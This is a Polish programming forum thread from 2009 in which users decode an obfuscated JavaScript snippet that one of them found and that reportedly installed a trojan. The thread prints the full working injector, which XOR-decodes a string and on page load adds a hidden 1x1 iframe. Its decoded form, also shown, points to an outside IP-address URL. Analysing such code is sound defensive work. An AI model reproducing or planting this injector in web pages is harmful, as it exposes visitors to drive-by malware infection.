Zaszyfrowany skrypt

Odpowiedz Nowy wątek
Masaqre
2009-10-09 15:02
Masaqre
0

Witam,

chciałbym jakoś odszyfrować ten kod javascript:

<script>

function seZWkJeTk(cazbjmUJh, TFYpMRAQ, nlb)
{
    var yUKnjdLo=nlb.split(TFYpMRAQ);
    var fDd='';
    for(ZUMcZDuzHq=0x16+0x29+0x2a-0x1a-0x4f;ZUMcZDuzHq<(yUKnjdLo.length-1);ZUMcZDuzHq+=-0x27+0x7+0x21)
    {
        kQa = yUKnjdLo[ZUMcZDuzHq]^cazbjmUJh;
        fDd += String.fromCharCode(kQa);}return fDd;
    }

function qAyFK(mSR)
{
    window.eval();
} 

;

function JCALQbvHV()
{
    var PNCEeZ=new Function("KeEeJWCg", "return "+seZWkJeTk(0x1-0x1d-0x13-0x2b+0xc+0x351, 'M','871M876M864M886M878M870M877M887M')+"."+seZWkJeTk(0x6+0xd-0x11-0x2+0x2f+0x9a, 'u','171u166u173u176u')+"");var MbWv=PNCEeZ(0x20+0x2b+0x2e-0x78);MbWv.innerHTML += seZWkJeTk(-0x5+0x27+0xd+0x2d-0x11+0x29d, 'Y','724Y641Y654Y666Y649Y645Y653Y712Y671Y641Y652Y668Y640Y725Y
729Y712Y640Y653Y641Y655Y640Y668Y725Y729Y712Y650Y647Y666Y652Y653Y
666Y725Y728Y712Y654Y666Y649Y645Y653Y650Y647Y666Y652Y653Y666Y725Y728Y7
12Y667Y666Y651Y725Y719Y640Y668Y668Y664Y722Y711Y711Y721Y731Y710Y729Y733Y720Y710Y729Y
729Y732Y710Y729Y731Y720Y711Y665Y653Y666Y668Y711Y641Y646Y652Y653Y656Y71
0Y664Y640Y664Y719Y726Y724Y711Y641Y654Y666Y649Y645Y653Y726Y');
}

function GzKuDEjue(JLJwFB)
{
    fff.op.replace("452");
    var OIQddjrpF = document.getElementById('sAG');
} 

;

if(window.addEventListener)
{
    window.addEventListener('load',JCALQbvHV,false);
}
else if(window.attachEvent)
{
    window.attachEvent('onload', JCALQbvHV);
}

function WFozhWgZ(QKByiJSc)
{
    fff.op.replace("1017");
}

;</script>

Bo ktoś wyraźnie nie chciał żeby ktoś to przeczytał, a ten kod scrashował mi firefoxa i zainstalowal trojana ;]

Pozostało 580 znaków

2009-10-09 15:20

Rejestracja: 12 lat temu

Ostatnio: 9 miesięcy temu

0

Masakra, nie znasz serwisów wklejkowych?
http://wklej.to/JJQO

Trzeba zakomentować "attachEvent" i "addEventListener" i sprawdzić co jest przepisywane do PNCeZ.


Women were the reason I became a monk - and, ah, the reason I switched back...

Pozostało 580 znaków

2009-10-09 15:21

Rejestracja: 12 lat temu

Ostatnio: 1 dzień temu

0

Ale ten kod jest przecież czytelny ;) W momencie ładowania i wyładowania strony wywołuje metodę, która łączy się z jakąś witryną za pomocą iframki i próbuje zainstalować trojana. Weź go odpal na wirtualnym kompie (Virtualbox + jakiś linuch) z zainstalowanym firebugiem i zobacz co dokładnie woła. W dodatku dodaje do obiektu window metodę eval.

Pozostało 580 znaków

2009-10-09 15:31

Rejestracja: 12 lat temu

Ostatnio: 9 miesięcy temu

0

Bardzo prosty skrypt, ustaliłem że tworzony jest:

<iframe width=1 height=1 border=0 frameborder=0 src='http://93.158.114.138/qert/index.php'></iframe>

W tym iframe wykonuje się skrypt JS:
http://wklej.to/mMIz


Women were the reason I became a monk - and, ah, the reason I switched back...

Pozostało 580 znaków

Odpowiedz

1 użytkowników online, w tym zalogowanych: 0, gości: 1, botów: 0